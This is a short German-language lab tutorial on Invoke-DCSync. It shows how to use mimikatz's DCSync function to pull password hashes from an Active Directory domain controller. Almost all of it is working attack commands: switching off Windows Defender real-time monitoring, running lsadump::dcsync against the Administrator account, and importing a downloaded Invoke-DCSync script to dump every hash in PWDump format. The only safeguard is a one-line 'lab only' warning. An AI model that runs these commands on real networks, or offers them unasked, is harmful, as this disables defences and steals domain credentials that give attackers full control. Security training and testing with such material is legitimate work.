
Invoke-DCSync
Invoke-DCSync Referenz: https://adsecurity.org/?p=1729 Referenz: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ Ziel: Passwort-Hashes aller Benutzerkonten auf einem Domänencontroller mithilfe der DCSync-Funktion von mimikatz abrufen
Warnung: Nur in einer Laborumgebung durchführen.
mimikatz implementierte ein Tool namens DCSync, das es mimikatz ermöglicht, einen Domänencontroller zu impersonieren und zu versuchen, alle Passwort-Hashes von einem anderen Domänencontroller abzurufen.
Möglicherweise müssen Sie Windows Defender deaktivieren.
Öffnen Sie PowerShell als Administrator und geben Sie Folgendes ein
$ Set-MpPreference -DisableRealtimeMonitoring $true
Starten Sie mimikatz
$ lsadump::dcsync /domain:test.local /user:Administrator
Jetzt haben Sie den Passwort-Hash dieses Benutzers.
Dies erfordert, dass Sie über Administratorzugriff verfügen, insbesondere über das Attribut mit dem Common Name Get-Replication-Changes-All.
Sie können das Modul Invoke-DCSync verwenden, um alle Hashes zu extrahieren.
Download von: https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat